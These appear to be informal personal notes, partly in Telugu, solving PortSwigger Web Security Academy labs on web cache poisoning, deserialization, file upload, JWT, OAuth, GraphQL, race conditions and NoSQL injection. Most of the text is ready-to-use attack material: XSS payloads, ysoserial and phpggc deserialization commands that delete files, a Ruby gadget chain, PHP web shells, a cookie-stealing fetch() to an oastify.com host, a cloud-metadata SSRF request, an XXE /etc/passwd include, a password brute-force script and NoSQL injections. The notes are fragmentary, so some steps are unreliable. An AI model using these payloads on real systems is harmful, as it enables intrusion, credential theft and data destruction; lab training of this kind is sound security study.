 -alert(1)-"

show responce in browser

3.Web cache poisoning with multiple headers

refresh browser,

4.Targeted web cache poisoning using an unknown header

gess perameter headers

5.Web cache poisoning via an unkeyed query string
 '/><script>alert(1)</script>

rq in browser

6.Web cache poisoning via an unkeyed query parameter

gess perameter get paremeters

7.Parameter cloaking

gess paremeters GET PAREMETERS

GET /js/geolocate.js?
callback=setCountryCookie&utm_content=foo;callback=arbitraryFunction
show responce in browser

8.Web cache poisoning via a fat GET request

callback=alert(0)

9.URL normalization
10.URL normalization
 random</p><script>alert(1)</script><p>

Insecure deserialization
1.Modifying serialized objects

it s normal
2.Modifying serialized data types
similar to above

here i changed user name strin to 13 because administratior is 13 charecters,&romved the

access token in there string for i put intigar &set to 0.

3.Using application functionality to exploit [insecure deserialization]

here we need 2 accounts

take this session &pest it in post delet session replace

here i changed the string &path to file wt i want to delete

4.Arbitrary object injection in PHP

some times we cant modiefy here,look in target sectin

You can sometimes read source code by appending a tilde ( ~) to a filename to retrieve an
editor-generated backup file.

O:14:"CustomTemplate":1:
{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}
5.Exploiting Java deserialization with Apache Commons

actively scan this host

open kali download ysoserial ,

In Java versions 16 and above, you need to set a series of

command-line arguments for Java to run ysoserial. For example:

java -jar ysoserial-all.jar \ --add-

opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \ --
add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED
\ --add-opens=java.base/java.net=ALL-UNNAMED \ --add-
opens=java.base/java.util=ALL-UNNAMED \ [payload] '[command]'

6.Exploiting Java deserialization with Apache Commons

if you find this in ro0 in starting in cookie ,use ysoserial

In Java versions 16 and above:

java -jar ysoserial-all.jar \ --add-

opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \ --
add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED
\ --add-opens=java.base/java.net=ALL-UNNAMED \ --add-
opens=java.base/java.util=ALL-UNNAMED \ CommonsCollections4 'rm
/home/carlos/morale.txt' | base64

In Java versions 15 and below:

java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' |

base64
copy the all & past it in burp decoder,encode url

7.Exploiting PHP deserialization with a pre-built gadget chain

Internal Server Error: Symfony Version: 4.3.6

remove some cookie see the error & send home page to repeater in responce section look
key words like --
https://github.com/ambionics/phpggc

./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64

it is called object

You now need to construct a valid cookie containing this malicious object and sign it
correctly using the secret key you obtained earlier. You can use the following PHP script to
do this. Before running the script, you just need to make the following changes:

Assign the object you generated in PHPGGC to the $object variable.

Assign the secret key that you copied from the phpinfo.php file to the $secretKey
variable.

<?php $object = "OBJECT-GENERATED-BY-PHPGGC"; $secretKey = "LEAKED-SECRET-KEY-

FROM-PHPINFO.PHP"; $cookie = urlencode('{"token":"' . $object .
'","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}'); echo
$cookie;

This will output a valid, signed cookie to the console.

service apache2 start

http://localhost/phpexploit.php

8.Exploiting Ruby deserialization using a documented gadget chain

decode as basc64
Gem::SpecFetcher Gem::Installer # prevent the payload from running when we Marshal.dump
it module Gem class Requirement def marshal_dump [@requirements] end end end
wa1 = Net::WriteAdapter.new(Kernel, :system) rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1) rs.instance_variable_set('@git_set', "id") wa2 =
Net::WriteAdapter.new(rs, :resolve) i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0) i.instance_variable_set('@header', "aaa") n =
Net::BufferedIO.allocate n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2) t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n) r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t) payload = Marshal.dump([Gem::SpecFetcher,
Gem::Installer, r]) puts payload.inspect puts Marshal.load(payload)

https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
https://onecompiler.com/ruby/3zxkkqk8e

take the output

take the out put past it in cookie value

this is payload

BAhbCGMVR2VtOjpTcGVjRmV0Y2hlcmMTR2VtOjpJbnN0YWxsZXJVOhVHZW06%0D%0AOlJlcX
VpcmVtZW50WwZvOhxHZW06OlBhY2thZ2U6OlRhclJlYWRlcgY6CEBp%0D%0Ab286FE5ldDo6Q
nVmZmVyZWRJTwc7B286I0dlbTo6UGFja2FnZTo6VGFyUmVh%0D%0AZGVyOjpFbnRyeQc6CkB
yZWFkaQA6DEBoZWFkZXJJIghhYWEGOgZFVDoSQGRl%0D%0AYnVnX291dHB1dG86Fk5ldDo6V
3JpdGVBZGFwdGVyBzoMQHNvY2tldG86FEdl%0D%0AbTo6UmVxdWVzdFNldAc6CkBzZXRzbzs
OBzsPbQtLZXJuZWw6D0BtZXRob2Rf%0D%0AaWQ6C3N5c3RlbToNQGdpdF9zZXRJIh9ybSAvaG
9tZS9jYXJsb3MvbW9yYWxl%0D%0ALnR4dAY7DFQ7EjoMcmVzb2x2ZQ%3D%3D

or you can modify in burp repeater

Information disclosure
1.Information disclosure in error messages

normal
2.Information disclosure on debug page
in search bar search some key words like,{secret,password,api,users}

3.Source code disclosure via backup files

go to engement tools,discover content ,run session

4.Authentication bypass via [information disclosure]
5.Information disclosure in version control history
engagement tools discover content
save select items
wget -r https://0a670078049c8873818143e8004b0084.web-security-academy.net/.git
ls , cd 0a670078049c8873818143e8004b0084.web-security-academy.net , ls -a , cd .git , git
branch , git log , git diff f088b3443bd7171ae1c15dec835b0bce5977b5db
056cb9cba2b5d3e90f37c50411eaabd3452e364f

Business logic vulnerabilities

1.Excessive trust in client-side controls

enable those settings

modify price .

2.High-level logic vulnerability

here there is no product change price,soo look for anthor vulnerbility,add 2 more products
to cart

add mines value before quantity.refresh page.{-}

see the total was changed,

3.Inconsistent security controls

change u r email to this u see admin feild

4.Flawed enforcement of business rules

Log in and notice that there is a coupon code, NEWCUST5 .

At the bottom of the page, sign up to the newsletter. You receive another
coupon code, SIGNUP30 .

Add the leather jacket to your cart.

 Go to the checkout and apply both of the coupon codes to get a discount on
your order.

Try applying the codes more than once. Notice that if you enter the same code
twice in a row, it is rejected because the coupon has already been applied. However, if you
alternate between the two codes, you can bypass this control.

5.Low-level logic flaw

see here price is increacing,so we can try some null payloads(empty the cart & in the
repeater tab send to intruder )
go browser cart check its stuck with some point of count
look carefully there is a minus value in total{-}
back to repeater send multi pull times like 10 or 15

back to browser u ll see price is decreasing,

in that mind we can equal balance to decrese '.'

6.Inconsistent handling of exceptional input

Go to the account registration page. Notice the message telling DontWannaCry

employees to use their company email address.

From the button in the lab banner, open the email client. Make a note of the
unique ID in the domain name for your email server ( @YOUR-EMAIL-ID.web-security-
academy.net ).

Go back to the lab and register with an exceptionally long email address in
the format:
 very-long-string@YOUR-EMAIL-ID.web-security-academy.net

The very-long-string should be at least 300 characters long. {very lo0ng

string means {123456789} reapet multipul times

Go to the email client and notice that you have received a confirmation email.
Click the link to complete the registration process.

Log in and go to the "My account" page. Notice that your email address has
been truncated to 255 characters.

Log out and go back to the account registration page.

Register a new account with another long email address, but this time
include dontwannacry.com as a subdomain in your email address as follows:

very-long-string@dontwannacry.com.YOUR-EMAIL-ID.web-security-academy.net

Make sure that the very-long-string is the right number of characters so

that the " m " at the end of @dontwannacry.com is character 255 exactly.

Go to the email client and click the link in the confirmation email that you
have received. Log in to your new account and notice that you now have access to the
admin panel. The confirmation email was successfully sent to your email client, but the
application server truncated the address associated with your account to 255 characters.
As a result, you have been able to register with what appears to be a valid
@dontwannacry.com address. You can confirm this from the "My account" page

7.Weak isolation on dual-use endpoint * remove current oassworde paremeter tottaly *

Notice that if you remove the current-password parameter entirely, you are able to
successfully change your password without providing your current one.

8.Insufficient workflow validation

1. With Burp running, log in and buy any item that you can afford with your
store credit.

2. Study the proxy history. Observe that when you place an order, the POST
/cart/checkout request redirects you to an order confirmation page. Send GET
/cart/order-confirmation?order-confirmation=true to Burp Repeater.
3. Add the leather jacket to your basket.

4. In Burp Repeater, resend the order confirmation request. Observe that

the order is completed without the cost being deducted from your store credit and the
lab is solved.

9.Authentication bypass via flawed state machine

With Burp running, complete the login process and notice that you need to select your role
before you are taken to the home page. Log out and then go back to
the login page. In Burp, turn on proxy intercept then log in.

Forward the POST /login request. The next request is GET /role-selector .
Drop this request and then browse to the lab's home page. Observe that your role has
defaulted to the administrator role and you have access to the admin panel.

9.Infinite money logic flaw

POST /cart POST /cart/coupon POST /cart/checkout GET /cart/order-confirmation?
order-confirmed=true POST /gift-card
Run a Macro
Send to Intruder
go to browser & refresh your store credits will high,

10.Authentication bypass via encryption oracle

send both 2 repeater
this is normal request

take the post response set cookie value,change in Get request cookie.
take the stay logged in cookie & past in GET
wiener:1703950716797 its time stamp
delete 1st 2 lines of bytes
copy the cookie

send to repeater
this is normal request

completely remove session cookie,& replace stay logged in cookie.

HTTP Host header attacks
1.Basic password reset poisoning
if this not work change http 2 to http1
2.Host header authentication bypass
3.Web cache poisoning via ambiguous requests
store it
show responce in browser

4.Routing-based SSRF
5.SSRF via flawed request parsing
look csrf in responce

GET https://YOUR-LAB-ID.web-security-academy.net/admin/delete?
csrf=QCT5OmPeAAPnyTKyETt29LszLL7CbPop&username=carlos

6.Host validation bypass via connection state attack

add tab group
/admin/delete?username=carlos&csrf=

OAuth authentication

1.Authentication bypass via OAuth implicit flow

show responce in browser

2.Forced OAuth profile linking

 Turn on proxy interception and select the "Attach a social profile" option again.

Go to Burp Proxy and forward any requests until you have intercepted the one
for GET /oauth-linking?code=[...] . Right-click on this request and select "Copy URL".

Drop the request. This is important to ensure that the code is not used and,
therefore, remains valid.
3.OAuth account hijacking via redirect_uri

intersept the request .bz in history it not show

copy url

iframe src="https://oauth-YOUR-LAB-OAUTH-SERVER-ID.oauth-server.net/auth?
client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-
server.net&response_type=code&scope=openid%20profile%20email">

< add before above that

 https://YOUR-LAB-ID.web-security-academy.net/oauth-callback?code=STOLEN-CODE

then log out

https://0a44008504d6e3d0807c85c0001600dc.web-security-academy.net/oauth-callback?
code=t1cRtTqDk4HSkUIoZyptKdvDwchTAL0ILBqhILSXLX2

4.Stealing OAuth access tokens via an open redirect

it also similar to above redirect is not showing in history so intersept it ,& redirect is not
work this time
log out

its conformation to path traverls

script> if (!document.location.hash) { window.location = 'https://oauth-YOUR-OAUTH-

SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-
ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-
callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.exploit-
server.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile%20
email' } else { window.location = '/?'+document.location.hash.substr(1) }

<add before above

decode url

5.SSRF via OpenID dynamic client registration

 POST /reg HTTP/1.1 Host: oauth-YOUR-OAUTH-SERVER.oauth-server.net Content-
Type: application/json { "redirect_uris" : [ "https://example.com"
], "logo_uri" : "https://BURP-COLLABORATOR-SUBDOMAIN" }

POST /reg HTTP/1.1

Host: oauth-0a3c00cc033a41cd8188845c02f30006.oauth-server.net
Content-Type: application/json

{
"redirect_uris" : [
"https://example6.com"
],
"logo_uri" : "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"
}

File upload vulnerabilities

1.Remote code execution via web shell upload
 <?php echo file_get_contents('/home/carlos/secret'); ?>

open imeage in new tab

2.Web shell upload via Content-Type restriction bypass

open imeage in new tab

3.Web shell upload via [path traversal

php file em chupinchaka pothe,burp GET responce lo chusthe code text lo run
aavthundhi,POST reqest ni repeter ki send chesi,content -dispsition lo exploit ki mundhu ../
ni add chesi chustam,404 error vasthe /ni url encode chesi same place lo upload chestam,
(browser /url encoded place lo normal / petti refresh chestam..
4.Web shell upload via extension blacklist bypass

php file not allow vasthe,post reqest ni 2 time repeter ki send chesi,1st reqest lo iivi add
cheyali{ Change the value of the filename parameter to .htaccess.
Change the value of the Content-Type header to text/plain.

Replace the contents of the file (your PHP payload) with the following Apache directive:
AddType application/x-httpd-php .l33t}2nd request lo{Change the value of the filename
parameter from exploit.php to exploit.l33t. Send the request again and notice that the file
was uploaded successfully. }ivvi add cheyali
Change the value of the filename parameter to .htaccess

AddType application/x-httpd-php .l33t

refresh & open imeage in new tab

5.Web shell upload via obfuscated file extension

 %00.jpg

6.Remote code execution via polyglot web shell upload

 exiftool -Comment="<?php echo 'START ' .
file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg
-o polyglot.php

JWT
1.JWT authentication bypass via unverified signature
2.JWT authentication bypass via flawed signature verification
3.JWT authentication bypass via weak signing key
replace the token with modified one

4.JWT authentication bypass via jwk header injection

5.JWT authentication bypass via jku header injection
copy the all value past in note pad

{ "keys": [ { "kty": "RSA", "e": "AQAB",

"kid": "893d8f0b-061f-42c2-a4aa-5056e12b8ae7", "n":
"yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaF
Yw" } ] }

above is payload

replace "kid" & n value &store it

this is normal one
replace kid value,& "jku",& sub.

6.JWT authentication bypass via kid header path traversal

Replace the generated value for the k property with a Base64-encoded null byte ( AA== ).
this is normal request
 ../../../../../../../dev/null

Essential skills
1.Scanning non-standard data structures
u need to try 2 or 3 time to pop error

'">
<svg/onload=fetch //nh8zbq0uabywzfzu5do41gmujlphd71zrnid53ts\.oastify.com >:2TWUtrz
jkBaV72RPkbxI8VYx3tkpdb4g

like above we need to modify that

'"><svg/onload=fetch(`//YOUR-COLLABORATOR-
PAYLOAD/${encodeURIComponent(document.cookie)}`)>:YOUR-SESSION-ID

'">
<svg/onload=fetch( //oe6h4iduvd131u0kxkwvuccaj1psdi17.oastify.com/${encodeURICompon
ent(document.cookie)} )>:2TWUtrzjkBaV72RPkbxI8VYx3tkpdb4g

Go back to the Collaborator tab. After approximately one minute

2.Discovering vulnerabilities quickly with targeted scanning
there is no login function onely one function that is product stock check function , so i
onely give that to active scan ,
productId=<xi:include parse="text" href="file:///etc/passwd"/>&storeId=1

Prototype pollution

1.Client-side prototype pollution via browser APIs

2.DOM XSS via client-side prototype pollution

same as above

3.DOM XSS via an alternative prototype pollution vector

same as above

4.Client-side prototype pollution in third-party libraries

5.Privilege escalation via server-side prototype pollution

"proto": { "foo":"bar" }

"proto": { "isAdmin":true }
6.Detecting server-side prototype pollution without polluted property reflection

"__proto__": { "foo":"bar" }
7.Bypassing flawed input filters for server-side prototype pollution
"constructor": {
"prototype": {
"foo":"bar"
}
}

"constructor": {
"prototype": {
"isAdmin":"true"
}
}

8.Remote code execution via server-side prototype pollution

"__proto__": { "execArgv":[ "--

eval=require('child_process').execSync('rm /home/carlos/morale.txt')" ] }
GraphQL API vulnerabilities
1.Accessing private GraphQL posts
in Dash board
cp the all data
2.Accidental exposure of private GraphQL fields

login with wrong credintails

send to repeat

orginal
modified

3.Finding a hidden GraphQL endpoint

before login try every graphical end points

/graphql
/graphiql
/api
/v1
/graphql/v1
/v1/graphql
/api/graphql
/graphql/api
/graphql/graphql
/graphiql/v1
/v1/graphqil
/api/graphiql
/graphiql/api
/graphiql/graphiql
api?query=query{__typename}

https://graphql-kit.com/graphql-voyager/
encode url

this is old

enter new line after schema

right click on responce,copy to file chose desktop, save as a " schema.json"
open schema.json in note pad , remove the header & copy all body
1st take GET user info

{ "data": { "getUser": null } }

4.Bypassing GraphQL brute force protections

send that multipul times

there is time out error

copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,drag
on,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyu
iop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,
000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,bus
ter,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,t
homas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,je
ssica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159
753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chel
sea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matri
x,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((eleme
nt,index)=>` bruteforce$index:login(input:{password: "$password", username:
"carlos"}) { token success }
`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));cons
ole.log("The query has been copied to your clipboard.");

Open the lab in Burp's browser.

Right-click the page and select Inspect.

Select the Console tab.

Paste the script and press Enter

here numbers is importent,past that in note pad
5.Performing CSRF exploits over GraphQL
change email functionality

send to repeter

change request method

again change request method back to POST

now we see there is content type is changed ,because in json was not support CSRF

now send orginal request once again to repeter to see inql

 query=%0A++++mutation+changeEmail%28%24input%3A+ChangeEmailInput%21%29+%7B%0A+
+++++++changeEmail%28input%3A+%24input%29+%7B%0A++++++++++++email%0A++++++++%7
D%0A++++%7D%0A&operationName=changeEmail&variables=%7B%22input%22%3A%7B%22emai
l%22%3A%22hacker%40hacker.com%22%7D%7D

past it in modified request,,now generate CSRF poc to send to victim

change email id

Race conditions
1.Limit overrun [race conditions
send to turbo intruder

make sure before , youn remove coupon code in browser

then hit attack

go to browser refresh

now its done here , if it not engough credits then go to halt configar with diffrent number

2.Bypassing rate limits via race conditions

after 4 attempts off login there is time out error

it happens to every account

take POST login request send to repeater 20 times

create tab with separate connections, every 4th request is time out error
so back to proxy tab select POST login request right click select extensions ,turbo
intruder,send to turbo intruder,above is the actual request.{examples/race-single-packet-
attack.py}

take the below payload replace it with actual one,in request don't forget to change
password value { %s } copy the payloads to the clip board then click attack.

def queueRequests(target, wordlists): # as the target supports HTTP/2, use

engine=Engine.BURP2 and concurrentConnections=1 for a single-packet attack
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1, engine=Engine.BURP2
) # assign the list of candidate passwords from your
clipboard passwords = wordlists.clipboard # queue a login request
using each password from the wordlist # the 'gate' argument withholds the
final part of each request until engine.openGate() is invoked for password
in passwords: engine.queue(target.req, password, gate='1') # once
every request has been queued # invoke engine.openGate() to send all
requests in the given gate simultaneously engine.openGate('1') def
handleResponse(req, interesting): table.add(req)
3.Multi-endpoint race conditions
make sure your cart is empty
4.Single-endpoint race conditions
Someone with the address carlos@ginandjuice.shop has a pending invite to be an
administrator for the site, but they have not yet created an account. Therefore, any user
who successfully claims this address will automatically inherit admin privileges.

5.Exploiting time-sensitive vulnerabilities

send POST request 2 times to repeater,& 1 time is GET request
each time token was changed
create a the 2 POST request to one group

completely remove cookie in GET request

in there u find a new session & new csrf ,take both replace it with ,in the second POST
request,also a user name.

send in parallel
take that link,past it in note pad

change the user name to carlos live the token as it is.open in new browser.

NoSQL injection
1.Detecting NoSQL injection

'+'
Make sure to URL-encode the payload by highlighting it and using the Ctrl-U
 ' || 1 || 'x

'||1||'x

2.Exploiting NoSQL operator injection to bypass authentication

{
"$ne":""
}
{
"$regex":"wien.*"
}

{"username":{
"$regex":"admin.*"
},"password":{
"$ne":""
}
}

3.Exploiting NoSQL injection to extract data

it means its 8 characters passwd { administrator' && this.password.length < 30 ||
'a'=='b }

send to introduer

' && this.password[§0§]=='§a§

control +u & create resorce poll 1 & in 1 st position numbers & 2 nd possition latters

4.Exploiting NoSQL operator injection to extract unknown fields

 {"$ne":"invalid"}

, "$where": "0"}

"Object.keys(this)[1].match('^.{}.*')"

send to intruder
this.passwordReset.match('^.{0}.*')
change reqest method post to get

Request in browser > Original session

API testing
~ email change function
send 2 requests too repeter
2.Exploiting server-side parameter pollution in a query string

Please check your email: "*@normal-user.net"{forgot password}

here x is the field value ,in simple list select server side variable names
3.Finding and exploiting an unused API endpoint

{PRICE change Function}

send again this request to repeter,to check price is changeing or not?
4.Exploiting a mass assignment vulnerability